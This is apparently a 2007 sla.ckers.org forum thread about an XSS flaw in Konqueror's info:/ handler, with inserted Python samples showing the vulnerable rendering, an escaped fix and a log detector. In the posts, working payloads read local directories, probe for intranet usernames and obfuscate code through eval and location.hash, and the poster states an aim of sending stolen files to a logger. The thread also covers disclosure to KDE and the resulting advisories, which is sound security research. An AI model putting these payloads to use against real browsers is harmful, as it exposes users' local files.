Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
KDE (konqueror) XSS
Posted by: faz3d
Date: July 31, 2007 08:19AM

An XSS exists in KDE 3.5.3 running Konqueror 3.5.3
under the info:/ protocol. The proof of concept
is as follows:

info:/<img src='x' onerror='alert("xss")'>

This could allow for the reading of local files
through use of iframes and innerHTML
via the file:// protocol. This can be
exploited remotely through a malicious link
or JavaScript on a site.

http://null-byt3.co.uk
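An added illustration, not Konqueror's code and not from this post, of the bug class described above: a handler that reflects the requested info node name into its HTML output verbatim, beside the same template with the name escaped. The template, the truncation at the first `/` that the thread observes, and the helper names are assumptions.

```python
import html
import re

# Constructed model of an info:/ style handler reflecting the requested node
# name into an HTML page. Illustration only; the template and the "cut off at
# the first /" rule are assumptions modelled on the thread's observations.

def node_from_url(url: str) -> str:
    """Strip the 'info:/' scheme prefix and keep only the first path component,
    mirroring the thread's note that output is cut off after the first '/'."""
    if not url.startswith("info:/"):
        raise ValueError("not an info: URL")
    path = url[len("info:/"):]
    return path.split("/", 1)[0]

def render_vulnerable(url: str) -> str:
    """Reflects the node name verbatim: markup in the name becomes markup in the page."""
    node = node_from_url(url)
    return f"<html><body><h1>Info page: {node}</h1><p>No such node: {node}</p></body></html>"

def render_fixed(url: str) -> str:
    """Same template, but the untrusted node name is HTML-escaped (quotes included),
    so angle brackets and attribute quotes survive only as entities."""
    node = html.escape(node_from_url(url), quote=True)
    return f"<html><body><h1>Info page: {node}</h1><p>No such node: {node}</p></body></html>"

# Tags that should never appear inside the body unless they came from the template.
TAG_RE = re.compile(r"<\s*(img|iframe|script|svg|object|embed)\b", re.I)

def has_active_markup(page: str) -> bool:
    """Crude check used to compare the two renderings: True if the body contains
    a tag from TAG_RE (the template itself only uses h1 and p)."""
    body = page.split("<body>", 1)[1].split("</body>", 1)[0]
    return bool(TAG_RE.search(body))

# The first PoC from the post, used as the untrusted input.
POC = "info:/<img src='x' onerror='alert(\"xss\")'>"

if __name__ == "__main__":
    print(render_vulnerable(POC))  # img tag lands in the page unchanged
    print(render_fixed(POC))       # &lt;img src=&#x27;x&#x27; ... inert text
```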

Re: KDE (konqueror) XSS
Posted by: faz3d
Date: July 31, 2007 10:12AM

Check their connect with their smb protocol..
The only problem with this XSS is that it is cut off
after /'s..

info:/<iframe src=file:%></

This does mean that you can find other
users on their intranet with JavaScript.

i.e. you would find files in the iframe with:
info:/<iframe src=file:validuser></

But not if the user didn't exist:
info:/<iframe src=file:invalideuser></

EDIT:
Got around the problem of it cutting off anything after the /
with eval. It now looks like this:

info:/<img src='x' onerror='eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,105,102,114,34,41,46,115,114,99,61,39,102,105,108,101,58,118,97,108,105,100,117,115,101,114,47,67,47,39))'><iframe src=file:xxx id=ifr>

The ASCII equates to:
document.getElementById("ifr").src='file:validuser/C/'

This will show the C drive of "validuser".
The only problem now is that innerHTML doesn't work...

EDIT 2:
Decided to use location.hash with substr, much easier:

info:/<img src='x' onerror='eval(location.hash.substr(1,100))'><iframe src=file:megs id=ifr>/code>aa#document.getElementById('ifr').src="file:///root/"

This will show you root's directory..

Now I just need to figure out a way of passing this information on to
a logger..

http://null-byt3.co.uk



Edited 4 time(s). Last edit at 07/31/2007 11:10AM by faz3d.

Re: KDE (konqueror) XSS
Posted by: Anonymous User
Date: July 31, 2007 12:53PM

Nice work, I never heard about the info:/

It's really amazing how many resource identifiers there are in browsers and registered by programs, when you actually only need as many as the number of fingers on your hand.

Re: KDE (konqueror) XSS
Posted by: Anonymous User
Date: July 31, 2007 01:27PM

That's a very nice find! It wouldn't hit that many users though but still has potential.

You tried XHRing arbitrary files already?

I also just upgraded the PHPIDS rules - PoC:
http://demo.php-ids.org/?test=info:/%3Cimg%20src='x'%20onerror='alert(%22xss%22)'%3E/code%3E

Greetings,
.mario
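Added example, not part of .mario's post and not PHPIDS code: a small log-side check in the spirit of the rule update above, run over constructed access-log lines. It also shows why the location.hash variant from earlier in the thread is only partly visible in server logs. Names and sample lines are assumptions.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample lines in Apache combined-log format (not real traffic).
# Line 2 carries the thread's first PoC URL-encoded in a query parameter, as in
# the PHPIDS demo link above; line 3 carries the later location.hash loader.
SAMPLE_LOG = [
    "10.0.0.5 - - [31/Jul/2007:10:12:00 +0100] \"GET /docs?page=info:/gcc HTTP/1.1\" 200 512 \"-\" \"Konqueror/3.5\"",
    "10.0.0.9 - - [31/Jul/2007:10:13:00 +0100] \"GET /?test=info:/%3Cimg%20src='x'%20onerror='alert(%22xss%22)'%3E HTTP/1.1\" 200 88 \"-\" \"Konqueror/3.5\"",
    "10.0.0.9 - - [31/Jul/2007:10:14:00 +0100] \"GET /?test=info:/%3Cimg%20src='x'%20onerror='eval(location.hash.substr(1,100))'%3E HTTP/1.1\" 200 88 \"-\" \"Konqueror/3.5\"",
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
# An info:/ URL whose remainder opens a tag or carries an on* event handler.
INFO_MARKUP_RE = re.compile(r"info:/\S*?(<\s*[a-z]|\bon[a-z]+\s*=)", re.I)
FRAGMENT_RE = re.compile(r"location\.hash", re.I)

def decode_request(line: str) -> Optional[str]:
    """Pull the request target out of a log line and percent-decode it twice,
    so a double-encoded payload is inspected in its final form."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    return unquote(unquote(m.group(1)))

def flag_info_xss(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, reason) for each request whose target carries an
    info:/ URL with embedded markup. A target that also references location.hash
    is annotated: the '#...' fragment holding the real payload is never sent to
    the server, so the log only ever shows the loader part."""
    findings = []
    for n, line in enumerate(lines, 1):
        target = decode_request(line)
        if target is None or not INFO_MARKUP_RE.search(target):
            continue
        reason = "markup in info:/ URL"
        if FRAGMENT_RE.search(target):
            reason += "; payload carried in URL fragment (not logged)"
        findings.append((n, reason))
    return findings

if __name__ == "__main__":
    for n, reason in flag_info_xss(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```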

Re: KDE (konqueror) XSS
Posted by: faz3d
Date: July 31, 2007 06:57PM

I thought of it but at the time I hadn't
thought of using location.hash, so it would
have been too much ASCII / I couldn't use /'s before
that. I will include a remote JS file to do it
if it works...
EDIT:
I came up with the idea of using AJAX as soon as
I found the XSS as you can see from my site:
http://null-byt3.co.uk/memberxarea/viewtopic.php?p=223
EDIT 2:
I have also been working on a script to grab
local/remote files before finding the XSS so
I will put it to use and tell you what happens..

http://null-byt3.co.uk



Edited 2 time(s). Last edit at 07/31/2007 07:11PM by faz3d.

Re: KDE (konqueror) XSS
Posted by: timb
Date: August 02, 2007 09:54AM

This and a number of other XSS etc have already been reported to kde.org as part of a research paper I wrote called Kreating havoK. IO slaves are interesting, I would suggest people go play with them. The first result of my fuzzing them was http://trolltech.com/company/newsroom/announcements/press.2007-07-27.7503755960 but expect more issues to come soon. We reported on the 11th July 2007.



Edited 1 time(s). Last edit at 08/02/2007 09:55AM by timb.

Re: KDE (konqueror) XSS
Posted by: Anonymous User
Date: August 02, 2007 10:27AM

@timb

Sounds interesting, any ideas of sharing the paper after it?

Re: KDE (konqueror) XSS
Posted by: timb
Date: August 02, 2007 10:42AM

The paper will be published when we've finished chatting with the KDE folk. I'll probably make the fuzzer available too, since IO slaves vary on different installs.. My default Debian install has around 60 to play with, but there are many more. We found multiple XSS points (both in URL and reflected from remote services), directory traversal, a format string vulnerability amongst other things all in a short space of time but I'm willing to bet there is more to find. As I say, go play. It's as much fun as Firefox :).

Re: KDE (konqueror) XSS
Posted by: Anonymous User
Date: August 02, 2007 11:35AM

I'm looking forward to it, I don't have that much time to toy with it myself. It would be a great learning curve to read the paper since this stuff isn't very well documented or written about, so do drop a note when it's time please ^^

Thanks.

Re: KDE (konqueror) XSS
Posted by: faz3d
Date: August 03, 2007 12:47PM

Would like to read that myself..
Tell me when it's done!

http://null-byt3.co.uk

Re: KDE (konqueror) XSS
Posted by: timb
Date: November 01, 2009 03:23PM

Finally on their way ... http://www.ocert.org/advisories/ocert-2009-015.html ... expect our advisories next week!
